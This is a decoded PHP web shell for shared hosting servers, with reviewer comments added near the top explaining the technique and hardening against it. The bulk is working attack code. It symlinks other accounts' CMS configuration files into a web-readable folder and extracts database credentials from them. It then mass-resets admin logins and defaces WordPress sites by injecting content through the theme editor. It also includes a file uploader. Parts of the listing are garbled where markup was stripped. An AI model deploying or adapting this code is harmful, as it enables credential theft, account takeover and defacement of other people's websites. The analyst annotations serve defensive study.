/* Decoded by unphp.net */ ?>
'.$domain.''.$owner['name'].'/WordPress'.Chr(10); file_put_contents("temp.txt",$str,FILE_APPEND); } } } }
// NOTE(review): the fragment above is the tail of code whose beginning is not
// present in this listing (the opening PHP tag and the markup inside the string
// literals appear to have been stripped during extraction). It is left as found.

// ---------------------------------------------------------------------------
// Analyst summary of the visible section
// ---------------------------------------------------------------------------
// Cross-account configuration harvesting on a shared host. For every account
// name taken from /etc/passwd the script creates symlinks inside its own
// web-served "pee/" directory that point at well-known CMS configuration files
// under that account's directory, renamed to "<account>-<CMS>.txt" so the web
// server returns them as plain text instead of executing them.
//
// Filesystem artifacts written by the visible code, relative to the script's
// working directory: "pee/<account>-<CMS>.txt" symlinks, "temp.txt",
// "pee.tmp", and "COOKIE.txt".
//
// Hardening that blunts this technique: per-account filesystem isolation,
// Apache "Options SymLinksIfOwnerMatch" in place of FollowSymLinks, PHP
// open_basedir, and CMS configuration files that are not world-readable.

// Read the local account database and split it into entries.
// NOTE(review): the separator shown is a single space; a newline may have been
// collapsed during extraction, unverified.
$etc = file_get_contents("/etc/passwd");
$etcz = explode(" ",$etc);
foreach($etcz as $etz){
    // First colon-delimited field of the entry, used below as the account name.
    $etcc = explode(":",$etz);
    // Silences PHP warnings and notices from here on, including symlink() failures.
    error_reporting(0);
    // The target path is built from the script's own location: $dir[1] is the
    // first path component of the working directory and $dir[3] the third,
    // with the account name substituted as the second component.
    $current_dir = posix_getcwd();
    $dir = explode("/",$current_dir);
    // WordPress configuration, document root and common sub-directories.
    // Note that several calls reuse the same link name.
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
    // phpBB and vBulletin configuration.
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php','pee/'.$etcc[0].'-PhpBB.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php','pee/'.$etcc[0].'-vBulletin.txt');
    // Joomla configuration, document root and common sub-directories.
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
    // IPB, MyBB, SMF, Drupal, e107, Seditio and osCommerce configuration.
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php','pee/'.$etcc[0].'-IPB.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php','pee/'.$etcc[0].'-MyBB.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php','pee/'.$etcc[0].'-SMF.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php','pee/'.$etcc[0].'-Drupal.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php','pee/'.$etcc[0].'-e107.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php','pee/'.$etcc[0].'-Seditio.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php','pee/'.$etcc[0].'-osCommerce.txt');
    // WHMCS configuration under a list of guessed directory names; all of these
    // share the single link name "<account>-WHMCS.txt".
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
    symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
    // Appends "<account>/WordPress" to temp.txt when chk_header() reports success.
    // NOTE(review): $link is not assigned anywhere in the visible part of this
    // loop; its value here cannot be determined from the listing.
    if(chk_header($link)) {
        $str = ''.$etcc[0].'/WordPress'.Chr(10);
        file_put_contents("temp.txt",$str,FILE_APPEND);
    }
}

// chk_header($link): requests the response headers for $link with get_headers()
// and returns true when strpos() finds "200" at a non-zero offset in the first
// header line, false otherwise. Used as the "is this symlink readable over
// HTTP" probe, so each probe appears in the web server access log as a request
// from the server to itself.
function chk_header($link){
    $pee = get_headers($link,1);
    if(strpos($pee[0],"200")){
        return true;
    }else{
        return false;
    }
}

// Find($str,$start,$end): returns the text between the first occurrence of
// $start and the next occurrence of $end in $str. $len is computed but never
// read. No handling is visible for the case where either marker is absent.
function Find($str,$start,$end){
    $len = strlen($str);
    $start_pos = (strpos($str,$start) + strlen($start));
    $str = substr($str,$start_pos);
    $end_pos = strpos($str,$end);
    $str = substr($str,0,$end_pos);
    return $str;
}

// Base URL of the directory the script is served from: the request URL is built
// from SERVER_NAME and REQUEST_URI (always with the http scheme) and the text of
// its last "/"-separated segment is removed with str_replace().
$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = explode("/",$pageURL );
$pageURL =str_replace($u[count($u)-1],"",$pageURL );
####### function
// NOTE(review): in this listing the "function" keyword sits on the "#######"
// comment line above, so the cms_add declaration below is incomplete as
// extracted.
//
// cms_add($link,$domain,$owner,$cms): appends "-<cms>.txt" to $link, probes it
// with chk_header(), and on success appends a domain/owner/CMS line to
// "pee.tmp" and echoes the same line. $url is assigned but not used.
cms_add($link,$domain,$owner,$cms) {
    $link = $link.'-'.$cms.'.txt';
    if(chk_header($link)) {
        $url = 'http://'.$domain;
        $str = ' '.$domain.''.$owner.''.$cms.''.Chr(10);
        file_put_contents("pee.tmp",$str,FILE_APPEND);
        echo $str;
    }
}

// CurlPage($url,$post,$head): cURL wrapper that returns the response as a
// string. It follows redirects, keeps TLS peer and host verification enabled,
// copies the User-Agent of the incoming request, and persists cookies in
// "COOKIE.txt" in the working directory. A POST is sent only when $post
// compares loosely unequal to NULL. cURL errors are echoed, not raised.
function CurlPage($url,$post = null,$head = true) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, $head);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
    curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
    curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
    If ($post != NULL){
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
    $urlPage = curl_exec($ch);
    if(curl_errno($ch)){
        echo curl_error($ch);
    }
    curl_close($ch);
    return($urlPage);
}

// listall($file,$str): appends $str to $file. When the file already exists the
// append is skipped if strpos() finds $str at a non-zero offset in its current
// contents.
function listall($file,$str){
    if(file_exists($file)){
        $do = file_get_contents($file);
        if(!strpos($do,$str)){
            file_put_contents($file,$str,FILE_APPEND);
        }
    }else{
        file_put_contents($file,$str,FILE_APPEND);
    }
}

// Opens the string literal for the tool's menu banner; the literal continues on
// the following lines of the listing.
echo "
[ ./CmsDetector~ ] -- [ ./MassPASSChange~ ] -- [ ./Wp Mass Defacer~ ] -- [ ./Uploader~ ]


"; if(isset($_REQUEST['do'])){ switch ($_REQUEST['do']){ ################CMS DETECTOR case 'cms_detect': if(!file_exists('pee.tmp')){ @fopen('pee.tmp', 'w'); echo''; echo''; $p = 0; if(is_readable("/var/named")){ $list = scandir("/var/named"); $current_dir = posix_getcwd(); $dir = explode("/",$current_dir); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); error_reporting(0); $link = $pageURL.'pee/'.$owner['name']; cms_add($link,$domain,$owner['name'],"WordPress"); cms_add($link,$domain,$owner['name'],"Joomla"); cms_add($link,$domain,$owner['name'],"vBulletin"); cms_add($link,$domain,$owner['name'],"WHMCS"); cms_add($link,$domain,$owner['name'],"PhpBB"); cms_add($link,$domain,$owner['name'],"MyBB"); cms_add($link,$domain,$owner['name'],"IPB"); cms_add($link,$domain,$owner['name'],"SMF"); cms_add($link,$domain,$owner['name'],"Drupal"); cms_add($link,$domain,$owner['name'],"e107"); cms_add($link,$domain,$owner['name'],"Seditio"); cms_add($link,$domain,$owner['name'],"osCommerce"); } } } }else{ echo'
SITE
USER
CMS
'; echo''; $content = file_get_contents($pageURL.'pee.tmp'); echo $content; } break; ################MASS DEFACE case 'pass_change': echo <<
USER :
PASS :


PEE; if($_POST){ ################### USER & PASS ################ $user = $_POST['user']; $pass = $_POST['pass']; ################################################ if(is_readable("/var/named")) { echo'
SITE
USER
CMS
'; echo ''; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $url = 'http://'.$domain; if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt')) { $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt'; file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); $hostname = Find($cnf,"define('DB_HOST', '","');"); $username = Find($cnf,"define('DB_USER', '","');"); $password = Find($cnf,"define('DB_PASSWORD', '","');"); $dbname = Find($cnf,"define('DB_NAME', '","');"); $prefix = Find($cnf,"table_prefix = '","'"); $link=mysql_connect($hostname,$username,$password); if ($link) { $hash = crypt($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `user_login` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'"); $req =@mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'"); $data = mysql_fetch_array($req); $site_url=$data["option_value"]; error_reporting(0); echo ''; }else{ echo ''; } } elseif(chk_header($pageURL.'pee/'.$owner['name'].'-Joomla.txt')) { ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-Joomla.txt'); $config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt'; if(preg_match('%(JConfig|mosConfig)%',$cnf)){ ###### if(preg_match('%JConfig%', $cnf)){ $username=Find($cnf,"\$user = '","'"); $password=Find($cnf,"\$password = '","'"); $dbname=Find($cnf,"\$db = '","'"); $prefix=Find($cnf,"\$dbprefix = '","'"); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($user); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE 
`$tab` SET `password` ='$hash'"); echo ''; } } ##### elseif(preg_match('%mosConfig%',$cnf)){ $username=Find($cnf,"\$mosConfig_user = '","'"); $password=Find($cnf,"\$mosConfig_password = '","'"); $dbname=Find($cnf,"\$mosConfig_db = '","'"); $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'"); $pwd = md5($npass); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'"); echo ''; } } } ######### } } } } elseif(is_readable("/etc/passwd")){ echo'
DOMAINUSERCMSSTATUS
'.$domain.''.$owner['name'].'WordPresssuccess..
'.$domain.''.$owner['name'].'WordPressmysql fail
'.$domain.''.$owner['name'].'Joomlasuccess..
'; }else{ echo '
'.$domain.''.$owner['name'].'Joomlamysql fail
'.$domain.''.$owner['name'].'Joomlasuccess..
'; }else{ echo '
'.$domain.''.$owner['name'].'Joomlamysql fail
'; echo ''; foreach($etcz as $etz){ $etcc = explode(":",$etz); if(chk_header($pageURL.'pee/'.$etcc[0].'-WordPress.txt')) { $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt'; file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt'); ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt'); $hostname = Find($cnf,"define('DB_HOST', '","');"); $username = Find($cnf,"define('DB_USER', '","');"); $password = Find($cnf,"define('DB_PASSWORD', '","');"); $dbname = Find($cnf,"define('DB_NAME', '","');"); $prefix = Find($cnf,"table_prefix = '","'"); $link=mysql_connect($hostname,$username,$password); if ($link) { $hash = crypt($user); mysql_select_db($dbname,$link) ; $req =mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'"); $data = mysql_fetch_array($req); $site_url=$data["option_value"]; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `user_login` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'"); error_reporting(0); echo ''; } } elseif(chk_header($pageURL.'pee/'.$etcc[0].'-Joomla.txt')) { ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-Joomla.txt'); $config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt'; if(preg_match('%(JConfig|mosConfig)%',$cnf)){ ###### if(preg_match('%JConfig%', $cnf)){ $username=Find($cnf,"\$user = '","'"); $password=Find($cnf,"\$password = '","'"); $dbname=Find($cnf,"\$db = '","'"); $prefix=Find($cnf,"\$dbprefix = '","'"); $site_url = Find($cnf,"\$mailfrom = '","'"); $site_url = explode("@",$site_url); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'"); echo ''; } } ##### elseif(preg_match('%mosConfig%',$cnf)){ $username=Find($cnf,"\$mosConfig_user = 
'","'"); $password=Find($cnf,"\$mosConfig_password = '","'"); $dbname=Find($cnf,"\$mosConfig_db = '","'"); $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'"); $site_url = Find($cnf,"\$mailfrom = '","'"); $site_url = explode("@",$site_url); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'"); echo ''; } } } ######### } } } } break; ################MASS DEFACE case 'wp_def': ################### USER & PASS ################ $user = 'admin'; $pass = 'foo'; ################################################ echo <<

PEE; if($_POST){ $deface = file_get_contents(trim($_POST['deface_page'])); if(is_readable("/var/named")) { echo'
DOMAINUSERCMSSTATUS
'.$domain.''.$owner['name'].'WordPresssuccess..
'; }else{ echo '
'.$domain.''.$owner['name'].'WordPressmysql fail
'.$domain.''.$owner['name'].'Joomlasuccess..
'; }else{ echo '
'.$domain.''.$owner['name'].'Joomlamysql fail
'.$domain.''.$owner['name'].'Joomlasuccess..
'; }else{ echo '
'.$domain.''.$owner['name'].'Joomlamysql fail
'; echo ''; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $url = 'http://'.$domain; if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt')) { $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt'; file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); $hostname = Find($cnf,"define('DB_HOST', '","');"); $username = Find($cnf,"define('DB_USER', '","');"); $password = Find($cnf,"define('DB_PASSWORD', '","');"); $dbname = Find($cnf,"define('DB_NAME', '","');"); $prefix = Find($cnf,"table_prefix = '","'"); $link=mysql_connect($hostname,$username,$password); if ($link) { $hash = crypt($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `user_login` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'"); $req =@mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'"); $data = mysql_fetch_array($req); $site_url=$data["option_value"]; error_reporting(0); echo '"; } else { echo "error opening theme edtitor!"; } $nola = explode(Chr(10),$themeditor); foreach($nola as $nline){ if(preg_match('%theme-editor\.php\?file=%',$nline) && preg_match('%\((404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){ $modify[Find($nline,'(',')')] = Find($nline,''; if(is_array($modify)){ foreach($modify as $met=>$indfile){ $nri = str_replace('.','_',$met); $nri = "n".$nri; $indfile =str_replace("&","&",$indfile); $url = trim($site_url."/wp-admin/".$indfile); $themepage = CurlPage($url,""); $_wpnonce = Find($themepage,'name="_wpnonce" value="','"'); $_file = Find($themepage,'name="file" value="','"'); $nfile = explode('themes',$_file); $jfile = $site_url."/wp-content/themes".end($nfile); //Update file $url = 
$site_url."/wp-admin/theme-editor.php"; $postme = "newcontent=".$def."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File"; $themedied = CurlPage($url,$postme); if(preg_match('%
%',$themedied)){ $theme = Find($themeditor,'
  • 404 Template'); if(preg_match("/twenty ten/i",$theme)){ $theme = "twentyten"; } elseif(preg_match("/twenty eleven/i",$theme)){$theme = "twentyeleven";} $theme = trim(str_replace("/","",$theme)); $d = $site_url.'/wp-content/themes/'.$theme.'/404.php'; listall("wp.txt",$d.Chr(10)); } } echo 'LINK
    '; echo ''; }} ########################END DEFACE################# }else{ echo '
  • '; } }}}}} break; // Uploader case 'uploader': echo '
    '; echo '
    '; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '

    Done !!
    '; } else { echo 'Failed :(

    DOMAINUSERCMSSTATUSDEF URL
    '.$domain.''.$owner['name'].'WordPress[#] User Pass Changed
    '; $post = 'log=admin&pwd=foo&rememberme=forever&wp-submit=Log In&testcookie=1'; $def=""; $buffer0 = CurlPage($site_url.'/wp-login.php',$post); if(!preg_match("/logout/i",$buffer0)) { echo "[X] FAILED TO LOGIN
    "; }else{ echo "[#] LOGGED IN :D
    "; $urlz = $site_url."/wp-admin/theme-editor.php"; $themeditor = CurlPage($urlz,$cookie,null); if(preg_match("/update file/i",$themeditor)){ echo "theme-editor opened
    '.$domain.''.$owner['name'].'WordPress[x] mysql fail
    '; } } }} ?>